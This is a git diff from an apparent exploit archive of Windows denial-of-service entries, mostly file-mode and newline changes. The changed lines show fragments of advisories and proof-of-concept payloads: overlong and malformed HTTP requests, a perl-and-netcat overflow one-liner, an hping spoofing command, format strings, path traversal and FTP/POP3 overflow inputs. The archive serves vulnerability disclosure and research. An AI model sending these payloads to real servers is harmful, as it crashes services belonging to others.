b/platforms/windows/dos/21600.txt old mode 100755 new mode 100644 index eb415505b..11d3b55c7 --- a/platforms/windows/dos/21600.txt +++ b/platforms/windows/dos/21600.txt @@ -6,4 +6,4 @@ It has been discovered that BadBlue does not properly handle requests that do no GET HTTP/1.0 -GET HTTP/1.0 \ No newline at end of file +GET HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/dos/21612.txt b/platforms/windows/dos/21612.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21634.c b/platforms/windows/dos/21634.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21645.txt b/platforms/windows/dos/21645.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21653.c b/platforms/windows/dos/21653.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21673.txt b/platforms/windows/dos/21673.txt old mode 100755 new mode 100644 index 758a3c6c2..d73f4b7ea --- a/platforms/windows/dos/21673.txt +++ b/platforms/windows/dos/21673.txt @@ -6,4 +6,4 @@ When a HTTP POST command is made to the web calendaring service on port 8484, an An attacker may exploit this vulnerability by submitting the following request to a vulnerable server: -POST / HTTP/1.0 \ No newline at end of file +POST / HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/dos/21703.txt b/platforms/windows/dos/21703.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21712.txt b/platforms/windows/dos/21712.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21737.txt b/platforms/windows/dos/21737.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21741.txt b/platforms/windows/dos/21741.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21746.c b/platforms/windows/dos/21746.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21747.txt b/platforms/windows/dos/21747.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21789.txt b/platforms/windows/dos/21789.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21792.txt b/platforms/windows/dos/21792.txt old mode 100755 new mode 100644 index 45743b79a..85c57a0cd --- a/platforms/windows/dos/21792.txt +++ b/platforms/windows/dos/21792.txt @@ -5,4 +5,4 @@ Savant Webserver is prone to a denial of service attack, when processing a negat It should be noted that versions below 3.1 may also be vulnerable to this issue. GET / HTTP/1.0 -Content-Length: -1 \ No newline at end of file +Content-Length: -1 \ No newline at end of file diff --git a/platforms/windows/dos/21813.c b/platforms/windows/dos/21813.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21816.c b/platforms/windows/dos/21816.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21819.c b/platforms/windows/dos/21819.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21821.c b/platforms/windows/dos/21821.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21823.c b/platforms/windows/dos/21823.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21907.c b/platforms/windows/dos/21907.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21909.txt b/platforms/windows/dos/21909.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21915.txt b/platforms/windows/dos/21915.txt old mode 100755 new mode 100644 index 36702eb2f..668fc0ce3 --- a/platforms/windows/dos/21915.txt +++ b/platforms/windows/dos/21915.txt @@ -4,4 +4,4 @@ A weakness has been reported in some PC Firewall packages that could allow remot Under some circumstances, it is possible for remote users to deny service to various sites for users of PC Firewall software. By sending spoofed traffic that could be deemed malicious by the firewall software package, an attacker could effectively limit the sites a system is capable of reaching. -hping -e 13 -d 2 -s 6000 -p 2140 -2 host1.example.com -c 2 -a host2.example.com \ No newline at end of file +hping -e 13 -d 2 -s 6000 -p 2140 -2 host1.example.com -c 2 -a host2.example.com \ No newline at end of file diff --git a/platforms/windows/dos/21935.txt b/platforms/windows/dos/21935.txt old mode 100755 new mode 100644 index dfe89e6f7..93704553a --- a/platforms/windows/dos/21935.txt +++ b/platforms/windows/dos/21935.txt @@ -4,4 +4,4 @@ My Web Server is a web server software package distributed and maintained by MyW It has been reported that My Web Server does not properly handle long requests. Because of this, a remote user placing a HTTP GET request of excessive length could cause the server to become unstable. In most cases, a long GET request causes the web server to crash, requiring a manual restart of the service. -http://www.example.com/AAA...(approx. Ax994)...AAA \ No newline at end of file +http://www.example.com/AAA...(approx. Ax994)...AAA \ No newline at end of file diff --git a/platforms/windows/dos/21938.txt b/platforms/windows/dos/21938.txt old mode 100755 new mode 100644 index 22b091b71..1cbb6f836 --- a/platforms/windows/dos/21938.txt +++ b/platforms/windows/dos/21938.txt @@ -4,4 +4,4 @@ A problem with SimpleWebServer could make it possible for a user to deny service It has been reported that SimpleWebServer does not properly handle long requests. Because of this, a remote attacker placing a HTTP request of excessive length could cause the server to become unstable. In most cases, a long request causes the web server to crash, requiring a manual restart of the service. -http://<server>/AAA[...]AAA \ No newline at end of file +http://<server>/AAA[...]AAA \ No newline at end of file diff --git a/platforms/windows/dos/21941.txt b/platforms/windows/dos/21941.txt old mode 100755 new mode 100644 index 0e569621d..8786fb08d --- a/platforms/windows/dos/21941.txt +++ b/platforms/windows/dos/21941.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability by issuing excessively long 'GET' req Although unconfirmed, it may be possible for a remote attacker to exploit this issue to execute arbitrary system commands with the privileges of the ViaVideo process. -perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat 10.1.0.1 3603 \ No newline at end of file +perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat 10.1.0.1 3603 \ No newline at end of file diff --git a/platforms/windows/dos/21943.c b/platforms/windows/dos/21943.c old mode 100755 new mode 100644 index 434099c34..c18ca867b --- a/platforms/windows/dos/21943.c +++ b/platforms/windows/dos/21943.c @@ -237,5 +237,4 @@ main(int argc, char *argv[]) }while(childs--) wait(NULL); -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/dos/2195.html b/platforms/windows/dos/2195.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21951.c b/platforms/windows/dos/21951.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21952.c b/platforms/windows/dos/21952.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21953.txt b/platforms/windows/dos/21953.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21954.txt b/platforms/windows/dos/21954.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21965.txt b/platforms/windows/dos/21965.txt old mode 100755 new mode 100644 index 67656b2bc..1ed66b5fa --- a/platforms/windows/dos/21965.txt +++ b/platforms/windows/dos/21965.txt @@ -26,4 +26,4 @@ pass ****** +OK dark@dark's mailbox has 13 total messages (2274775 octets). dele -1 -Connection to host lost. \ No newline at end of file +Connection to host lost. \ No newline at end of file diff --git a/platforms/windows/dos/21981.txt b/platforms/windows/dos/21981.txt old mode 100755 new mode 100644 index 70ddaa7b1..e1683eee7 --- a/platforms/windows/dos/21981.txt +++ b/platforms/windows/dos/21981.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability by issuing a POST request with an inv POST / HTTP/1.1 Host: 127.0.0.1:2001 -Content-Length: 1 \ No newline at end of file +Content-Length: 1 \ No newline at end of file diff --git a/platforms/windows/dos/21982.txt b/platforms/windows/dos/21982.txt old mode 100755 new mode 100644 index e97891132..6992f73f4 --- a/platforms/windows/dos/21982.txt +++ b/platforms/windows/dos/21982.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/6098/info A denial of service vulnerability has been reported for Xeneo web server. When the web server processes a malformed HTTP request, it will crash and lead to the denial of service condition. http://www.example.com/% -http://www.example.com/%A \ No newline at end of file +http://www.example.com/%A \ No newline at end of file diff --git a/platforms/windows/dos/22.c b/platforms/windows/dos/22.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22006.txt b/platforms/windows/dos/22006.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22019.pl b/platforms/windows/dos/22019.pl index 3603bc660..0c20026c3 100755 --- a/platforms/windows/dos/22019.pl +++ b/platforms/windows/dos/22019.pl @@ -36,4 +36,4 @@ close $so; print "-->"; print "\tnow test if the distant host is down\n"; -exit; \ No newline at end of file +exit; \ No newline at end of file diff --git a/platforms/windows/dos/2204.c b/platforms/windows/dos/2204.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2208.html b/platforms/windows/dos/2208.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2210.c b/platforms/windows/dos/2210.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22100.txt b/platforms/windows/dos/22100.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22117.txt b/platforms/windows/dos/22117.txt old mode 100755 new mode 100644 index d56e89f84..612aa77e9 --- a/platforms/windows/dos/22117.txt +++ b/platforms/windows/dos/22117.txt @@ -4,4 +4,4 @@ A denial of service vulnerability has been reported for iCal. The vulnerability Restarting the service is necessary to restore functionality. -http//target/* \ No newline at end of file +http//target/* \ No newline at end of file diff --git a/platforms/windows/dos/22118.txt b/platforms/windows/dos/22118.txt old mode 100755 new mode 100644 index 77a87a28c..9fce5ba87 --- a/platforms/windows/dos/22118.txt +++ b/platforms/windows/dos/22118.txt @@ -5,4 +5,4 @@ A buffer overflow vulnerability has been reported for iCal. The vulnerability oc Restarting the service is necessary to restore functionality. nc target 80 -AAAA \ No newline at end of file +AAAA \ No newline at end of file diff --git a/platforms/windows/dos/22119.html b/platforms/windows/dos/22119.html old mode 100755 new mode 100644 index 732efd7a0..3cd2b0d0c --- a/platforms/windows/dos/22119.html +++ b/platforms/windows/dos/22119.html @@ -14,4 +14,4 @@ if(page=="crash"){ main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">crash!</a>";} } </script> </head> -<body onLoad="displayPage('onload');"> <hr> <span id="main"></span> </body> </html> \ No newline at end of file +<body onLoad="displayPage('onload');"> <hr> <span id="main"></span> </body> </html> \ No newline at end of file diff --git a/platforms/windows/dos/22132.txt b/platforms/windows/dos/22132.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22162.txt b/platforms/windows/dos/22162.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22172.txt b/platforms/windows/dos/22172.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22196.txt b/platforms/windows/dos/22196.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22215.txt b/platforms/windows/dos/22215.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22232.txt b/platforms/windows/dos/22232.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22237.txt b/platforms/windows/dos/22237.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22239.txt b/platforms/windows/dos/22239.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22240.txt b/platforms/windows/dos/22240.txt old mode 100755 new mode 100644 index 1afd102e4..494906149 --- a/platforms/windows/dos/22240.txt +++ b/platforms/windows/dos/22240.txt @@ -30,4 +30,4 @@ String(new byte[30000]))); - - exception.printStackTrace(); - - } - - } -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/dos/22245.txt b/platforms/windows/dos/22245.txt old mode 100755 new mode 100644 index 8750290cf..722d1b50b --- a/platforms/windows/dos/22245.txt +++ b/platforms/windows/dos/22245.txt @@ -13,4 +13,4 @@ mkdir \\?\c:\%A%\%B%c: cd cd AAAAAAAAAAAA* cd AAAAAAAAAAAA* cd BBBBBBBBBBBB* -cd .. \ No newline at end of file +cd .. \ No newline at end of file diff --git a/platforms/windows/dos/22255.txt b/platforms/windows/dos/22255.txt old mode 100755 new mode 100644 index b3d55919a..7951452c2 --- a/platforms/windows/dos/22255.txt +++ b/platforms/windows/dos/22255.txt @@ -13,4 +13,4 @@ RTF files may be opened automatically by Internet Explorer and Outlook. {\colortbl ;\red255\green0\blue255;} \viewkind4\uc1\pard\cf1\kerning2\f0 \fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/dos/22258.txt b/platforms/windows/dos/22258.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22290.c b/platforms/windows/dos/22290.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22310.txt b/platforms/windows/dos/22310.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22328.txt b/platforms/windows/dos/22328.txt old mode 100755 new mode 100644 index 45a1410e3..69bad98c3 --- a/platforms/windows/dos/22328.txt +++ b/platforms/windows/dos/22328.txt @@ -18,4 +18,4 @@ SET A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA SET B = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBB mkdir \\?\c:\%A% -mkdir \\?\c:\%B% \ No newline at end of file +mkdir \\?\c:\%B% \ No newline at end of file diff --git a/platforms/windows/dos/22330.txt b/platforms/windows/dos/22330.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2238.html b/platforms/windows/dos/2238.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22390.c b/platforms/windows/dos/22390.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22395.txt b/platforms/windows/dos/22395.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22397.txt b/platforms/windows/dos/22397.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22401.php b/platforms/windows/dos/22401.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22402.txt b/platforms/windows/dos/22402.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22420.txt b/platforms/windows/dos/22420.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22447.txt b/platforms/windows/dos/22447.txt old mode 100755 new mode 100644 index 077f44514..1c5ffef13 --- a/platforms/windows/dos/22447.txt +++ b/platforms/windows/dos/22447.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7246/info It has been reported that Instant TopTools does not properly handle some types of requests. Because of this, a remote user could potentially deny service to a host using the vulnerable software. -http://www.example.com/cgi-bin/hpnst.exe?c=p+i=hpnst.exe \ No newline at end of file +http://www.example.com/cgi-bin/hpnst.exe?c=p+i=hpnst.exe \ No newline at end of file diff --git a/platforms/windows/dos/22460.txt b/platforms/windows/dos/22460.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22464.txt b/platforms/windows/dos/22464.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22467.txt b/platforms/windows/dos/22467.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22518.html b/platforms/windows/dos/22518.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22550.pl b/platforms/windows/dos/22550.pl index 0b97abaf1..72f4577cd 100755 --- a/platforms/windows/dos/22550.pl +++ b/platforms/windows/dos/22550.pl @@ -14,4 +14,4 @@ my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100); print "Content-type: text/html\r\n"; print qq~Content-Disposition: filename="$filename"\r\n~; print "\r\n"; -print "<html><body>Love & Peace :)</body></html>\r\n"; \ No newline at end of file +print "<html><body>Love & Peace :)</body></html>\r\n"; \ No newline at end of file diff --git a/platforms/windows/dos/22553.txt b/platforms/windows/dos/22553.txt old mode 100755 new mode 100644 index ae1c06adf..1f2cc9ab1 --- a/platforms/windows/dos/22553.txt +++ b/platforms/windows/dos/22553.txt @@ -4,4 +4,4 @@ Microsoft BizTalk Server 2002 contains a boundary condition error that could all It is important to note that the HTTP Receiver is an optional component and is not installed by default. -POST /Site/biztalkhttpreceive.dll?XXXX...(more than 250 chars) HTTP/1.0 \ No newline at end of file +POST /Site/biztalkhttpreceive.dll?XXXX...(more than 250 chars) HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/dos/22576.txt b/platforms/windows/dos/22576.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22586.c b/platforms/windows/dos/22586.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22587.c b/platforms/windows/dos/22587.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22591.txt b/platforms/windows/dos/22591.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22608.txt b/platforms/windows/dos/22608.txt old mode 100755 new mode 100644 index 0bfcf2a2f..3bcf1f540 --- a/platforms/windows/dos/22608.txt +++ b/platforms/windows/dos/22608.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7617/info A denial of service vulnerability has been reported for Snowblind. The vulnerability will cause the web server to crash when processing a malformed HTTP request. -http://localhost/</ \ No newline at end of file +http://localhost/</ \ No newline at end of file diff --git a/platforms/windows/dos/22610.txt b/platforms/windows/dos/22610.txt old mode 100755 new mode 100644 index eeaf2efd1..4e8880f05 --- a/platforms/windows/dos/22610.txt +++ b/platforms/windows/dos/22610.txt @@ -4,4 +4,4 @@ Snowblind Web Server has been reported prone to a buffer overflow vulnerability. Although unconfirmed, this vulnerability may be exploited to execute attacker-supplied code with the privileges of the vulnerable web server. -GET /fff[ x 129 ]ffff HTTP/1.0 \ No newline at end of file +GET /fff[ x 129 ]ffff HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/dos/22621.txt b/platforms/windows/dos/22621.txt old mode 100755 new mode 100644 index 2e749847f..e34a2d6a4 --- a/platforms/windows/dos/22621.txt +++ b/platforms/windows/dos/22621.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7639/info It has been reported that clicking a malformed 'callto:' URI in Internet Explorer will cause Windows 2000 systems to crash, resulting in a blue screen. This appears to be due to a boundary condition error in one of the URI parameters of the CALLTO protocol handler. -callto:msils/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAA+type=directory \ No newline at end of file +callto:msils/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAA+type=directory \ No newline at end of file diff --git a/platforms/windows/dos/22655.txt b/platforms/windows/dos/22655.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22666.txt b/platforms/windows/dos/22666.txt old mode 100755 new mode 100644 index 0bc365740..558f1fe40 --- a/platforms/windows/dos/22666.txt +++ b/platforms/windows/dos/22666.txt @@ -4,4 +4,4 @@ A buffer overflow vulnerability has been reported for Tornado www-Server. The vu Although unconfirmed, it may be possible to exploit this vulnerability to execute malicious attacker-supplied code. -http://www.example.com/aaa[471]aaa \ No newline at end of file +http://www.example.com/aaa[471]aaa \ No newline at end of file diff --git a/platforms/windows/dos/22667.txt b/platforms/windows/dos/22667.txt old mode 100755 new mode 100644 index 7ffff928b..6cabcf288 --- a/platforms/windows/dos/22667.txt +++ b/platforms/windows/dos/22667.txt @@ -11,4 +11,4 @@ pass XXXX +OK Access granted list -0 dele -0000 -quit \ No newline at end of file +quit \ No newline at end of file diff --git a/platforms/windows/dos/22668.txt b/platforms/windows/dos/22668.txt old mode 100755 new mode 100644 index 0cbdf06a4..ac2b97547 --- a/platforms/windows/dos/22668.txt +++ b/platforms/windows/dos/22668.txt @@ -13,4 +13,4 @@ Or Mail From : <ccccc....[Buffer size 2100 Bytes @xyz.com]> Or Rcpt to : <ccccc....[Buffer size 2100 Bytes @xyz.com]> -Quit \ No newline at end of file +Quit \ No newline at end of file diff --git a/platforms/windows/dos/22670.c b/platforms/windows/dos/22670.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22679.txt b/platforms/windows/dos/22679.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22680.txt b/platforms/windows/dos/22680.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22681.txt b/platforms/windows/dos/22681.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22685.txt b/platforms/windows/dos/22685.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22690.c b/platforms/windows/dos/22690.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22694.c b/platforms/windows/dos/22694.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22706.asm b/platforms/windows/dos/22706.asm old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22707.txt b/platforms/windows/dos/22707.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22718.c b/platforms/windows/dos/22718.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22757.c b/platforms/windows/dos/22757.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22759.txt b/platforms/windows/dos/22759.txt old mode 100755 new mode 100644 index de1d8c508..2ae927a5d --- a/platforms/windows/dos/22759.txt +++ b/platforms/windows/dos/22759.txt @@ -4,4 +4,4 @@ A vulnerability has been discovered in WebBBS Pro, which may allow a remote atta It has been reported that a remote attacker may cause the web server to throw an exception by making a malformed HTTP request. -http://www.example.com/* \ No newline at end of file +http://www.example.com/* \ No newline at end of file diff --git a/platforms/windows/dos/22774.txt b/platforms/windows/dos/22774.txt old mode 100755 new mode 100644 index ca242b45c..b07853fb1 --- a/platforms/windows/dos/22774.txt +++ b/platforms/windows/dos/22774.txt @@ -6,4 +6,4 @@ A vulnerability has been reported for myServer that may result in a denial of se Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. -[Ctrl]+C \ No newline at end of file +[Ctrl]+C \ No newline at end of file diff --git a/platforms/windows/dos/22780.txt b/platforms/windows/dos/22780.txt old mode 100755 new mode 100644 index 95ad2ce50..4467e9af3 --- a/platforms/windows/dos/22780.txt +++ b/platforms/windows/dos/22780.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/7926/info It has been reported that Mailtraq does not reliably handle format strings in some SMTP protocol fields. This may cause a system to become unstable and crash, allowing a remote attacker to deny service to the system. @@%s%p%n -%s%p%n \ No newline at end of file +%s%p%n \ No newline at end of file diff --git a/platforms/windows/dos/22790.txt b/platforms/windows/dos/22790.txt old mode 100755 new mode 100644 index 31031f9bb..b4c129f7e --- a/platforms/windows/dos/22790.txt +++ b/platforms/windows/dos/22790.txt @@ -6,4 +6,4 @@ The denial of service occurs when the server receives several successive malform CWD ..%c0%af....%c0%af....%c0%af....%c0%af....%c0%af....%c0%af.. CWD -\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..CWD /..%c0%af../..%c0%af../ \ No newline at end of file +\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..CWD /..%c0%af../..%c0%af../ \ No newline at end of file diff --git a/platforms/windows/dos/22794.txt b/platforms/windows/dos/22794.txt old mode 100755 new mode 100644 index 2575777e0..df6debb02 --- a/platforms/windows/dos/22794.txt +++ b/platforms/windows/dos/22794.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/7954/info It has been reported that Proxomitron does not properly handle some string types. Because of this, an attacker can cause the server to become unstable and crash. GET /../..0%%../ * (4504 chars) -GET \..\..\..\ * (4504 chars) \ No newline at end of file +GET \..\..\..\ * (4504 chars) \ No newline at end of file diff --git a/platforms/windows/dos/22816.txt b/platforms/windows/dos/22816.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22822.txt b/platforms/windows/dos/22822.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22823.txt b/platforms/windows/dos/22823.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22825.c b/platforms/windows/dos/22825.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22844.html b/platforms/windows/dos/22844.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22850.txt b/platforms/windows/dos/22850.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22855.txt b/platforms/windows/dos/22855.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22875.txt b/platforms/windows/dos/22875.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22878.txt b/platforms/windows/dos/22878.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22899.txt b/platforms/windows/dos/22899.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22900.php b/platforms/windows/dos/22900.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22945.txt b/platforms/windows/dos/22945.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22957.cpp b/platforms/windows/dos/22957.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/22970.txt b/platforms/windows/dos/22970.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23056.c b/platforms/windows/dos/23056.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23086.txt b/platforms/windows/dos/23086.txt old mode 100755 new mode 100644 index 5176e2b4f..2642af510 --- a/platforms/windows/dos/23086.txt +++ b/platforms/windows/dos/23086.txt @@ -25,4 +25,4 @@ finally MyStream.Free; end; Memo1.Lines.Add('finish'); -end; \ No newline at end of file +end; \ No newline at end of file diff --git a/platforms/windows/dos/23089.c b/platforms/windows/dos/23089.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23090.asm b/platforms/windows/dos/23090.asm old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23101.c b/platforms/windows/dos/23101.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23107.txt b/platforms/windows/dos/23107.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23117.txt b/platforms/windows/dos/23117.txt old mode 100755 new mode 100644 index d7569f287..9492196e6 --- a/platforms/windows/dos/23117.txt +++ b/platforms/windows/dos/23117.txt @@ -5,4 +5,4 @@ A buffer overflow vulnerability has been reported in FTP Desktop. The vulnerabil (FTP Desktop connected...) PADDING EBP EIP 220 [229xA][4xB][4xX] -(Access violation when executing 0x58585858) // 4xX \ No newline at end of file +(Access violation when executing 0x58585858) // 4xX \ No newline at end of file diff --git a/platforms/windows/dos/23118.txt b/platforms/windows/dos/23118.txt old mode 100755 new mode 100644 index 5642e3a8d..806db6d54 --- a/platforms/windows/dos/23118.txt +++ b/platforms/windows/dos/23118.txt @@ -14,4 +14,4 @@ Password: (FTP Desktop Sends 'PASS password') PADDING EBP EIP 331 [229xA][4xB][4xX] -(Access violation when executing 0x58585858) // 4xX \ No newline at end of file +(Access violation when executing 0x58585858) // 4xX \ No newline at end of file diff --git a/platforms/windows/dos/23124.txt b/platforms/windows/dos/23124.txt old mode 100755 new mode 100644 index 4f0817527..31edba662 --- a/platforms/windows/dos/23124.txt +++ b/platforms/windows/dos/23124.txt @@ -9,4 +9,4 @@ Winamp MIDI plugin, IN_MIDI.DLL has been reported prone to a buffer overflow iss 2 bytes Divisions 0001 4 bytes Track Header "MTrk" 4 bytes Track data size ffffffff <--- bug -... "aaaaaaaaaaaaaaaaaaaaa..." <--- fun \ No newline at end of file +... "aaaaaaaaaaaaaaaaaaaaa..." <--- fun \ No newline at end of file diff --git a/platforms/windows/dos/23130.txt b/platforms/windows/dos/23130.txt old mode 100755 new mode 100644 index aace276df..f4d3fc801 --- a/platforms/windows/dos/23130.txt +++ b/platforms/windows/dos/23130.txt @@ -10,4 +10,4 @@ It should be noted that only the WWW.exe process on a Windows system will crash Trying 127.0.0.1... Connected to 127.0.0.1 Escape character is '^]'. -GET /../.. HTTP/1.0 \ No newline at end of file +GET /../.. HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/dos/23139.txt b/platforms/windows/dos/23139.txt old mode 100755 new mode 100644 index f3a686783..c1eea0e25 --- a/platforms/windows/dos/23139.txt +++ b/platforms/windows/dos/23139.txt @@ -12,4 +12,4 @@ Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Moozatech (compatible; Moozatech Scanner) Host: 12.12.12.12 -Connection: Keep-Alive \ No newline at end of file +Connection: Keep-Alive \ No newline at end of file diff --git a/platforms/windows/dos/23145.c b/platforms/windows/dos/23145.c old mode 100755 new mode 100644 